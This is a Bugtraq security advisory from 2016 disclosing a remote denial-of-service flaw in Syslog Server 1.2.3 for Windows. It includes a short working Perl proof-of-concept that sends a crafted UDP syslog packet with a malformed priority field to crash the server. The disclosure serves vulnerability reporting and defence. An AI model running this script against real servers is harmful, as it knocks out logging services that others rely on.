[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201607041842.u64Iglnl006291@sf01web1.securityfocus.com>
Date: Mon, 4 Jul 2016 18:42:47 GMT
From: chaoyi.huang@...nect.polyu.hk
To: bugtraq@...urityfocus.com
Subject: Syslog Server "npriority" field remote Denial of Service
vulnerability
Title: Syslog Server "npriority" field remote Denial of Service vulnerability
Software : Syslog Server
Software Version : Syslog Server 1.2.3
Vendor: https://sourceforge.net/p/syslog-server/
Vulnerability Published : 2016-07-02
Vulnerability Update Time :
Status :
Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)
Bug Description :
Syslog Server 1.2.3 is a free syslog server for Windows systems.
The syslog server cannot handle the content of the npriority field well, whereupon the server may be collapsed by receiving a customized packet.
Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl -w
#PoC by demonalex (chaoyi.huang_at_connect.polyu.hk || demonalex_at_163.com)
use IO::Socket;
use POSIX qw(strftime);
$|=1;
$host=shift;
$port=shift;
die "Usage: $0 \$host \$port\n" if ((!defined($host)) || (!defined($port)));
$npriority = '<A>';
$ndate = strftime "%b%e %H:%M:%S", localtime;
$nhostname = "10.0.0.2";
$npid = 'fuzzer[10]';
$nmsg = "Syslog Fuzzer v2";
$header = $ndate.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con=new IO::Socket::INET->new(PeerPort=>$port, Proto=>'udp', PeerAddr=>$host);
$con->send($packet);
print "Done!\n";
$con->close;
exit(0);
-----------------------------------------------------------
Credits : This vulnerability was discovered by ChaoYi.Huang_at_connect.polyu.hk
mail: ChaoYi(dot)Huang(at)connect(dot)polyu(dot)hk / demonalex(at)163(dot)com / chaoyi(dot)huang(at)ccbny(dot)com
Pentester/Independent Researcher
Powered by blists - more mailing lists